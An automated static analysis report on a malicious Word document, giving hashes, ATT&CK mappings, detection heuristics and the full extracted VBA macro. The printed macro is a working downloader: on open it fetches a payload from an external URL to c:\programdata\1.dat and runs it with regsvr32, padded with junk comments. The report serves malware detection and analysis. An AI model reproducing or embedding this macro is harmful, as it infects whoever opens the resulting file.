Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 16e28494025fa62c…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 114.3 KB
Created: 2020-07-01 09:29:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-07-24
MD5: 651d2488b189f5e993990fe94dab3d95
SHA-1: f9c4c079d1f548392e55a935eb3d323ec5de25bb
SHA-256: 16e28494025fa62cfc22e7d22ff11c47aee04ebff4e7d76f9393499d4f7c72f1
Risk Score: 250

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1204.002 User Execution: Malicious File
  • T1105 Ingress Tool Transfer

The sample contains VBA macros with an AutoOpen function that runs when the document is opened. The macro calls URLDownloadToFile to fetch a payload from the reconstructed URL 'http://pelatihanspss.com/wp-content/plugins/sheet-music-library/_fKoYwVEM-jjJnSWG.php?x=MDAwMSCkimwUO3jPUmcxfCy3YdYaFhc4LQ3RaW9FGsqFmHLorT8WCqKuMJ5rsJQnxkjwJvPpPHTEyq_hIyH2GhGJsWtol4qnNvM4yw2nJ32g7iMQnQPkd_j0qf5lyADfg-G3Oz-sEc3ShTjHnsyMQuNgDg~~' and saves it as 'c:\programdata\1.dat'. The presence of the AutoOpen macro together with the use of URLDownloadToFile strongly indicates downloader functionality.

Heuristics (7)

  • ClamAV: Doc.Downloader.GreenBox6-9139694-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.GreenBox6-9139694-0
  • VBA project inside OOXML [medium, 4 related findings] OOXML_VBA
    Document contains a VBA project — VBA macros present
  • URLDownloadToFile in VBA [critical] OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script:
    #If VBA7 And Win64 Then
    Public Declare PtrSafe Function fF Lib "urlmon" Alias "URLDownloadToFileA" (ByVal a6 As LongPtr, ByVal WS As String, ByVal Da As String, ByVal Db As LongPtr, ByVal pi As LongPtr) As Long
    #Else
  • LOLBin reference in VBA [critical] OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script:
    Dim mF As New WshShell
    mF.exec "regsvr32 c:\programdata\1.dat"
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
    Attribute VB_Name = "Q"
    Sub autoopen()
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL (referenced by macro): http://pelatihanspss.com/wp-content/plugins/sheet-music-library/_fKoYwVEM-jjJnSWG.php?x=MDAwMSCkimwUO3jPUmcxfCy3YdYaFhc4LQ3RaW9FGsqFmHLorT8WCqKuMJ5rsJQnxkjwJvPpPHTEyq_hIyH2GhGJsWtol4qnNvM4yw2nJ32g7iMQnQPkd_j0qf5lyADfg-G3Oz-sEc3ShTjHnsyMQuNgDg~~

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 2780 bytes
SHA-256: e4e140dfe405d8088f794388e9ced19f898c5a7ad64926b02c326f204d0731d3

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Q"
Sub autoopen()

' Specter
' Tuft riverside simply oxygen vestal drivers
' Manufacturing refer gild gifts sulphurous
' Valparaiso different reinforce
' Defence deadline dawns fx
X8 = fF(0, "http://pelatihanspss.com/wp-content/plugins/sheet-music-library/_fKoYwVEM-jjJnSWG.php?x=MDAwMSCkimwUO3jPUmcxfCy3YdYaFhc4LQ3RaW9FGsqFmHLorT8WCqKuMJ5rsJQnxkjwJvPpPHTEyq_hIyH2GhGJsWtol4qnNvM4yw2nJ32g7iMQnQPkd_j0qf5lyADfg-G3Oz-sEc3ShTjHnsyMQuNgDg~~", "c:\programdata\1.dat", 0, 0)

' Harper voluble birthplace
' Campaign omega
' Fourth taxi
' Mesa telecom including loop
s
End Sub

Attribute VB_Name = "Q1"
Sub s()

' Incorrigible catechism
' Operatic prospective
' Exemplary mongol houseless
' Impost
' Specifically

' Instigation like abrogated
' Contraction above-mentioned corn
' November runtime
' Bin fragile deleterious specifications legislature
' Minister viewpicture
' Rectitude motors vbulletin elect

' Bewitch stamp scholars twenty-sixth
' Sight propaganda lynching ruling corset
' Msgstr disprove intellectual photographer trump placing

' Shorthand forecast liz mathematics kids bronchitis
' Roma allege ninety-five pun obj
' Compression javelin
' Ballet consortium

' Conditional
' Efface same passively
' Piedmont predicted judgment obtrusive

' Notifications disbelief
' Baize pants chic
' Denudation enumeration bayonet container calling
' Book hiv wrench

' Sucked subservient
' Geology cavalcade
' Cooked infectious acrobat
' Wi fork

' Malayan degrade shed disappoint liz dislodge
' Controlled succinct savor copiously
' Peking blog doggerel
' Magnesia cherry spelling
Dim mF As New WshShell
mF.exec "regsvr32 c:\programdata\1.dat"

' Foreign worldsex tools traditionary
' Banana cause
' Audit ionian vocals
End Sub

Attribute VB_Name = "OI"
#If VBA7 And Win64 Then
Public Declare PtrSafe Function fF Lib "urlmon" Alias "URLDownloadToFileA" (ByVal a6 As LongPtr, ByVal WS As String, ByVal Da As String, ByVal Db As LongPtr, ByVal pi As LongPtr) As Long
#Else
Public Declare Function fF Lib "urlmon" Alias "URLDownloadToFileA"(ByVal a6 As Long, ByVal WS As String, ByVal Da As String, ByVal Db As Long, ByVal pi As Long) As Long
#End If
Function tC(vk)

' Vermont crop alfonso passer shorn
' Recorders witnesses hydrocodone recognised impartially clap won
' Fw pointed mm
' Excuse til grove massive flux medusa
' Miscreant flexible contrite accounting
' Belied spatial
End Function
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 21504 bytes
SHA-256: f7d1e1f1a9554d6e2fb5afb160b316ce78791e5eaa1364db0579e5d44264d2ab